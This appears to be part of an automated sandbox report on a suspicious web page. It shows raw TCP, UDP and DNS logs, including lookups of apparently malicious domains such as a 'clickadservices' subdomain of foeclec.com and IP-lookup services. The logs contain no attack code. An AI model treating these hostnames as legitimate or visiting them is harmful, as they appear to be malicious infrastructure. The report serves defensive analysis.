                                                                                                                                      May 8, 2024 20:13:11.678024054 CEST49795443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:11.678037882 CEST44349795104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:11.688203096 CEST49796443192.168.2.16172.67.69.226
                                                                                                                                      May 8, 2024 20:13:11.688255072 CEST44349796172.67.69.226192.168.2.16
                                                                                                                                      May 8, 2024 20:13:11.688386917 CEST49796443192.168.2.16172.67.69.226
                                                                                                                                      May 8, 2024 20:13:11.688607931 CEST49797443192.168.2.163.231.248.100
                                                                                                                                      May 8, 2024 20:13:11.688644886 CEST443497973.231.248.100192.168.2.16
                                                                                                                                      May 8, 2024 20:13:11.688699007 CEST49797443192.168.2.163.231.248.100
                                                                                                                                      May 8, 2024 20:13:11.688888073 CEST49796443192.168.2.16172.67.69.226
                                                                                                                                      May 8, 2024 20:13:11.688905001 CEST44349796172.67.69.226192.168.2.16
                                                                                                                                      May 8, 2024 20:13:11.689054966 CEST49797443192.168.2.163.231.248.100
                                                                                                                                      May 8, 2024 20:13:11.689065933 CEST443497973.231.248.100192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.014256001 CEST44349795104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.014631987 CEST49795443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:12.014667034 CEST44349795104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.014990091 CEST44349795104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.015288115 CEST49795443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:12.015345097 CEST44349795104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.015434980 CEST49795443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:12.060128927 CEST44349795104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.195270061 CEST44349796172.67.69.226192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.195578098 CEST49796443192.168.2.16172.67.69.226
                                                                                                                                      May 8, 2024 20:13:12.195599079 CEST44349796172.67.69.226192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.196729898 CEST44349796172.67.69.226192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.196815014 CEST49796443192.168.2.16172.67.69.226
                                                                                                                                      May 8, 2024 20:13:12.197799921 CEST49796443192.168.2.16172.67.69.226
                                                                                                                                      May 8, 2024 20:13:12.197901964 CEST44349796172.67.69.226192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.197993994 CEST49796443192.168.2.16172.67.69.226
                                                                                                                                      May 8, 2024 20:13:12.198002100 CEST44349796172.67.69.226192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.239428997 CEST49796443192.168.2.16172.67.69.226
                                                                                                                                      May 8, 2024 20:13:12.401896954 CEST44349796172.67.69.226192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.402013063 CEST44349796172.67.69.226192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.402070045 CEST49796443192.168.2.16172.67.69.226
                                                                                                                                      May 8, 2024 20:13:12.403103113 CEST49796443192.168.2.16172.67.69.226
                                                                                                                                      May 8, 2024 20:13:12.403124094 CEST44349796172.67.69.226192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.405524015 CEST443497973.231.248.100192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.406019926 CEST49797443192.168.2.163.231.248.100
                                                                                                                                      May 8, 2024 20:13:12.406033993 CEST443497973.231.248.100192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.407339096 CEST443497973.231.248.100192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.407468081 CEST49797443192.168.2.163.231.248.100
                                                                                                                                      May 8, 2024 20:13:12.407730103 CEST49797443192.168.2.163.231.248.100
                                                                                                                                      May 8, 2024 20:13:12.407819033 CEST443497973.231.248.100192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.407897949 CEST49797443192.168.2.163.231.248.100
                                                                                                                                      May 8, 2024 20:13:12.448133945 CEST443497973.231.248.100192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.463291883 CEST49797443192.168.2.163.231.248.100
                                                                                                                                      May 8, 2024 20:13:12.463300943 CEST443497973.231.248.100192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.511353970 CEST49797443192.168.2.163.231.248.100
                                                                                                                                      May 8, 2024 20:13:12.570620060 CEST49798443192.168.2.16104.26.9.44
                                                                                                                                      May 8, 2024 20:13:12.570666075 CEST44349798104.26.9.44192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.570758104 CEST49798443192.168.2.16104.26.9.44
                                                                                                                                      May 8, 2024 20:13:12.571011066 CEST49798443192.168.2.16104.26.9.44
                                                                                                                                      May 8, 2024 20:13:12.571027040 CEST44349798104.26.9.44192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.657399893 CEST443497973.231.248.100192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.657480955 CEST443497973.231.248.100192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.657555103 CEST49797443192.168.2.163.231.248.100
                                                                                                                                      May 8, 2024 20:13:12.658431053 CEST49797443192.168.2.163.231.248.100
                                                                                                                                      May 8, 2024 20:13:12.658456087 CEST443497973.231.248.100192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.755779982 CEST44349795104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.755852938 CEST44349795104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.755935907 CEST49795443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:12.756720066 CEST49795443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:12.756733894 CEST44349795104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:13.067240000 CEST44349798104.26.9.44192.168.2.16
                                                                                                                                      May 8, 2024 20:13:13.067519903 CEST49798443192.168.2.16104.26.9.44
                                                                                                                                      May 8, 2024 20:13:13.067549944 CEST44349798104.26.9.44192.168.2.16
                                                                                                                                      May 8, 2024 20:13:13.068465948 CEST44349798104.26.9.44192.168.2.16
                                                                                                                                      May 8, 2024 20:13:13.068566084 CEST49798443192.168.2.16104.26.9.44
                                                                                                                                      May 8, 2024 20:13:13.068980932 CEST49798443192.168.2.16104.26.9.44
                                                                                                                                      May 8, 2024 20:13:13.069035053 CEST44349798104.26.9.44192.168.2.16
                                                                                                                                      May 8, 2024 20:13:13.069114923 CEST49798443192.168.2.16104.26.9.44
                                                                                                                                      May 8, 2024 20:13:13.069122076 CEST44349798104.26.9.44192.168.2.16
                                                                                                                                      May 8, 2024 20:13:13.114315033 CEST49798443192.168.2.16104.26.9.44
                                                                                                                                      May 8, 2024 20:13:13.277810097 CEST44349798104.26.9.44192.168.2.16
                                                                                                                                      May 8, 2024 20:13:13.277931929 CEST44349798104.26.9.44192.168.2.16
                                                                                                                                      May 8, 2024 20:13:13.278059959 CEST49798443192.168.2.16104.26.9.44
                                                                                                                                      May 8, 2024 20:13:13.278762102 CEST49798443192.168.2.16104.26.9.44
                                                                                                                                      May 8, 2024 20:13:13.278775930 CEST44349798104.26.9.44192.168.2.16
                                                                                                                                      May 8, 2024 20:13:14.677380085 CEST49717443192.168.2.16142.251.33.70
                                                                                                                                      May 8, 2024 20:13:14.677405119 CEST44349717142.251.33.70192.168.2.16
                                                                                                                                      May 8, 2024 20:13:22.384027004 CEST49799443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:22.384071112 CEST44349799104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:22.384155035 CEST49799443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:22.384526014 CEST49799443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:22.384541035 CEST44349799104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:22.717780113 CEST44349799104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:22.718121052 CEST49799443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:22.718147993 CEST44349799104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:22.718460083 CEST44349799104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:22.718770027 CEST49799443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:22.718827963 CEST44349799104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:22.718982935 CEST49799443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:22.764108896 CEST44349799104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:23.562808037 CEST44349799104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:23.562949896 CEST44349799104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:23.563013077 CEST49799443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:23.563081980 CEST49799443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:23.563101053 CEST44349799104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:29.476330042 CEST49748443192.168.2.16151.101.66.137
                                                                                                                                      May 8, 2024 20:13:29.476357937 CEST44349748151.101.66.137192.168.2.16
                                                                                                                                      May 8, 2024 20:13:31.328107119 CEST49717443192.168.2.16142.251.33.70
                                                                                                                                      May 8, 2024 20:13:31.328217030 CEST44349717142.251.33.70192.168.2.16
                                                                                                                                      May 8, 2024 20:13:31.328315973 CEST49717443192.168.2.16142.251.33.70
                                                                                                                                      May 8, 2024 20:13:33.987591028 CEST49801443192.168.2.16172.217.14.228
                                                                                                                                      May 8, 2024 20:13:33.987634897 CEST44349801172.217.14.228192.168.2.16
                                                                                                                                      May 8, 2024 20:13:33.987709999 CEST49801443192.168.2.16172.217.14.228
                                                                                                                                      May 8, 2024 20:13:33.987976074 CEST49801443192.168.2.16172.217.14.228
                                                                                                                                      May 8, 2024 20:13:33.987988949 CEST44349801172.217.14.228192.168.2.16
                                                                                                                                      May 8, 2024 20:13:34.324641943 CEST44349801172.217.14.228192.168.2.16
                                                                                                                                      May 8, 2024 20:13:34.324990988 CEST49801443192.168.2.16172.217.14.228
                                                                                                                                      May 8, 2024 20:13:34.325006962 CEST44349801172.217.14.228192.168.2.16
                                                                                                                                      May 8, 2024 20:13:34.325387001 CEST44349801172.217.14.228192.168.2.16
                                                                                                                                      May 8, 2024 20:13:34.325691938 CEST49801443192.168.2.16172.217.14.228
                                                                                                                                      May 8, 2024 20:13:34.325766087 CEST44349801172.217.14.228192.168.2.16
                                                                                                                                      May 8, 2024 20:13:34.370356083 CEST49801443192.168.2.16172.217.14.228
                                                                                                                                      May 8, 2024 20:13:35.694694042 CEST4970080192.168.2.16192.229.211.108
                                                                                                                                      May 8, 2024 20:13:35.875427961 CEST8049700192.229.211.108192.168.2.16
                                                                                                                                      May 8, 2024 20:13:35.875543118 CEST4970080192.168.2.16192.229.211.108
                                                                                                                                      May 8, 2024 20:13:36.530740023 CEST49802443192.168.2.1635.190.80.1
                                                                                                                                      May 8, 2024 20:13:36.530777931 CEST4434980235.190.80.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:36.530857086 CEST49802443192.168.2.1635.190.80.1
                                                                                                                                      May 8, 2024 20:13:36.531054974 CEST49802443192.168.2.1635.190.80.1
                                                                                                                                      May 8, 2024 20:13:36.531065941 CEST4434980235.190.80.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:36.862127066 CEST4434980235.190.80.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:36.862494946 CEST49802443192.168.2.1635.190.80.1
                                                                                                                                      May 8, 2024 20:13:36.862530947 CEST4434980235.190.80.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:36.863549948 CEST4434980235.190.80.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:36.863637924 CEST49802443192.168.2.1635.190.80.1
                                                                                                                                      May 8, 2024 20:13:36.864006996 CEST49802443192.168.2.1635.190.80.1
                                                                                                                                      May 8, 2024 20:13:36.864062071 CEST4434980235.190.80.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:36.864161968 CEST49802443192.168.2.1635.190.80.1
                                                                                                                                      May 8, 2024 20:13:36.864171028 CEST4434980235.190.80.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:36.908354044 CEST49802443192.168.2.1635.190.80.1
                                                                                                                                      May 8, 2024 20:13:37.240067005 CEST4434980235.190.80.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:37.240156889 CEST4434980235.190.80.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:37.240231991 CEST49802443192.168.2.1635.190.80.1
                                                                                                                                      May 8, 2024 20:13:37.240499020 CEST49802443192.168.2.1635.190.80.1
                                                                                                                                      May 8, 2024 20:13:37.240524054 CEST4434980235.190.80.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:37.241081953 CEST49803443192.168.2.1635.190.80.1
                                                                                                                                      May 8, 2024 20:13:37.241132021 CEST4434980335.190.80.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:37.241204977 CEST49803443192.168.2.1635.190.80.1
                                                                                                                                      May 8, 2024 20:13:37.241583109 CEST49803443192.168.2.1635.190.80.1
                                                                                                                                      May 8, 2024 20:13:37.241594076 CEST4434980335.190.80.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:37.573834896 CEST4434980335.190.80.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:37.574186087 CEST49803443192.168.2.1635.190.80.1
                                                                                                                                      May 8, 2024 20:13:37.574215889 CEST4434980335.190.80.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:37.574579000 CEST4434980335.190.80.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:37.574908972 CEST49803443192.168.2.1635.190.80.1
                                                                                                                                      May 8, 2024 20:13:37.574987888 CEST4434980335.190.80.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:37.575048923 CEST49803443192.168.2.1635.190.80.1
                                                                                                                                      May 8, 2024 20:13:37.575093985 CEST49803443192.168.2.1635.190.80.1
                                                                                                                                      May 8, 2024 20:13:37.575107098 CEST4434980335.190.80.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:37.945075989 CEST4434980335.190.80.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:37.945164919 CEST4434980335.190.80.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:37.945220947 CEST49803443192.168.2.1635.190.80.1
                                                                                                                                      May 8, 2024 20:13:37.945380926 CEST49803443192.168.2.1635.190.80.1
                                                                                                                                      May 8, 2024 20:13:37.945411921 CEST4434980335.190.80.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:43.577119112 CEST49804443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:43.577157021 CEST44349804104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:43.577266932 CEST49804443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:43.577522993 CEST49804443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:43.577537060 CEST44349804104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:43.913232088 CEST44349804104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:43.913619995 CEST49804443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:43.913649082 CEST44349804104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:43.913975954 CEST44349804104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:43.914283991 CEST49804443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:43.914350033 CEST44349804104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:43.914498091 CEST49804443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:43.956116915 CEST44349804104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:44.317687035 CEST44349801172.217.14.228192.168.2.16
                                                                                                                                      May 8, 2024 20:13:44.317840099 CEST44349801172.217.14.228192.168.2.16
                                                                                                                                      May 8, 2024 20:13:44.317898035 CEST49801443192.168.2.16172.217.14.228
                                                                                                                                      May 8, 2024 20:13:44.717437029 CEST44349804104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:44.717560053 CEST44349804104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:44.717633009 CEST49804443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:44.717675924 CEST49804443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:44.717699051 CEST44349804104.21.15.140192.168.2.16
                                                                                                                                      May 8, 2024 20:13:44.717709064 CEST49804443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:44.717767000 CEST49804443192.168.2.16104.21.15.140
                                                                                                                                      May 8, 2024 20:13:45.331058979 CEST49748443192.168.2.16151.101.66.137
                                                                                                                                      May 8, 2024 20:13:45.331120968 CEST49801443192.168.2.16172.217.14.228
                                                                                                                                      May 8, 2024 20:13:45.331149101 CEST44349801172.217.14.228192.168.2.16
                                                                                                                                      May 8, 2024 20:13:45.331165075 CEST44349748151.101.66.137192.168.2.16
                                                                                                                                      May 8, 2024 20:13:45.331254005 CEST49748443192.168.2.16151.101.66.137
                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      May 8, 2024 20:12:29.231794119 CEST53652531.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:29.278565884 CEST53569061.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:29.981769085 CEST6410253192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:12:29.981983900 CEST5148753192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:12:30.173295975 CEST53516561.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:30.224785089 CEST53514871.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:30.226372004 CEST53641021.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:31.089025021 CEST6331353192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:12:31.089209080 CEST6022953192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:12:31.260294914 CEST53602291.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:31.284400940 CEST53633131.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:32.396241903 CEST6137653192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:12:32.397345066 CEST5942153192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:12:32.398032904 CEST6020353192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:12:32.398487091 CEST5564453192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:12:32.559571028 CEST53613761.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:32.561207056 CEST53602031.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:32.561482906 CEST53594211.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:32.561507940 CEST53556441.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:33.925278902 CEST5466753192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:12:33.925453901 CEST5968853192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:12:34.008172035 CEST6505453192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:12:34.008981943 CEST5560953192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:12:34.088438988 CEST53546671.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:34.088557005 CEST53596881.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:34.171267986 CEST53650541.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:34.172333002 CEST53556091.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:35.760632038 CEST5238053192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:12:35.760829926 CEST6453953192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:12:35.925746918 CEST53523801.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:35.925767899 CEST53645391.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:36.366035938 CEST4950253192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:12:36.366275072 CEST6427953192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:12:36.529803038 CEST53642791.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:36.529850960 CEST53495021.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.140714884 CEST4998153192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:12:44.140888929 CEST6091053192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:12:44.311836958 CEST53609101.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:44.378726006 CEST53499811.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.138981104 CEST53527351.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.773524046 CEST5308553192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:12:47.773725986 CEST6061953192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:12:47.774044037 CEST5645153192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:12:47.774269104 CEST5686253192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:12:47.937278986 CEST53564511.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.937618017 CEST53606191.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.937772036 CEST53568621.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:47.946589947 CEST53530851.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:50.811722994 CEST53600891.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:12:51.288992882 CEST53492601.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:02.227554083 CEST138138192.168.2.16192.168.2.255
                                                                                                                                      May 8, 2024 20:13:04.594485044 CEST53555261.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:05.977713108 CEST53559941.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:10.383090973 CEST5067453192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:13:10.383233070 CEST5269453192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:13:10.547102928 CEST53526941.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:10.547247887 CEST53506741.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:11.523493052 CEST5962653192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:13:11.523691893 CEST5104753192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:13:11.524033070 CEST6493953192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:13:11.524198055 CEST5894853192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:13:11.686945915 CEST53596261.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:11.687180996 CEST53589481.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:11.687704086 CEST53510471.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:11.688189983 CEST53649391.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.405668020 CEST5632353192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:13:12.405836105 CEST5827253192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:13:12.569870949 CEST53582721.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:12.569892883 CEST53563231.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:29.052635908 CEST53598071.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:29.215894938 CEST53635821.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:36.366748095 CEST5546053192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:13:36.366894007 CEST5782953192.168.2.161.1.1.1
                                                                                                                                      May 8, 2024 20:13:36.530011892 CEST53554601.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:36.530040026 CEST53578291.1.1.1192.168.2.16
                                                                                                                                      May 8, 2024 20:13:57.201162100 CEST53603961.1.1.1192.168.2.16
                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      May 8, 2024 20:12:29.981769085 CEST192.168.2.161.1.1.10x8b33Standard query (0)telefornication.comA (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:29.981983900 CEST192.168.2.161.1.1.10xd353Standard query (0)telefornication.com65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:31.089025021 CEST192.168.2.161.1.1.10x89eeStandard query (0)0n18pyx-clickadservices-rebooot0fa.foeclec.comA (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:31.089209080 CEST192.168.2.161.1.1.10xc94cStandard query (0)0n18pyx-clickadservices-rebooot0fa.foeclec.com65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:32.396241903 CEST192.168.2.161.1.1.10xc403Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:32.397345066 CEST192.168.2.161.1.1.10xde5fStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:32.398032904 CEST192.168.2.161.1.1.10xf98fStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:32.398487091 CEST192.168.2.161.1.1.10x48dfStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:33.925278902 CEST192.168.2.161.1.1.10x4d40Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:33.925453901 CEST192.168.2.161.1.1.10x9898Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:34.008172035 CEST192.168.2.161.1.1.10xdb7bStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:34.008981943 CEST192.168.2.161.1.1.10xe1e6Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:35.760632038 CEST192.168.2.161.1.1.10x2155Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:35.760829926 CEST192.168.2.161.1.1.10xe1efStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:36.366035938 CEST192.168.2.161.1.1.10x6f68Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:36.366275072 CEST192.168.2.161.1.1.10x432dStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:44.140714884 CEST192.168.2.161.1.1.10x6a06Standard query (0)0n18pyx-clickadservices-rebooot0fa.foeclec.comA (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:44.140888929 CEST192.168.2.161.1.1.10x3f01Standard query (0)0n18pyx-clickadservices-rebooot0fa.foeclec.com65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:47.773524046 CEST192.168.2.161.1.1.10x94a8Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:47.773725986 CEST192.168.2.161.1.1.10x535fStandard query (0)cdn.socket.io65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:47.774044037 CEST192.168.2.161.1.1.10xf218Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:12:47.774269104 CEST192.168.2.161.1.1.10x25caStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:10.383090973 CEST192.168.2.161.1.1.10x8eb1Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:10.383233070 CEST192.168.2.161.1.1.10x7ce4Standard query (0)httpbin.org65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:11.523493052 CEST192.168.2.161.1.1.10x6e87Standard query (0)ipapi.coA (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:11.523691893 CEST192.168.2.161.1.1.10x4381Standard query (0)ipapi.co65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:11.524033070 CEST192.168.2.161.1.1.10x4abfStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:11.524198055 CEST192.168.2.161.1.1.10x9f22Standard query (0)httpbin.org65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:12.405668020 CEST192.168.2.161.1.1.10xb00bStandard query (0)ipapi.coA (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:12.405836105 CEST192.168.2.161.1.1.10x5d80Standard query (0)ipapi.co65IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:36.366748095 CEST192.168.2.161.1.1.10xbad0Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                      May 8, 2024 20:13:36.366894007 CEST192.168.2.161.1.1.10xa12eStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
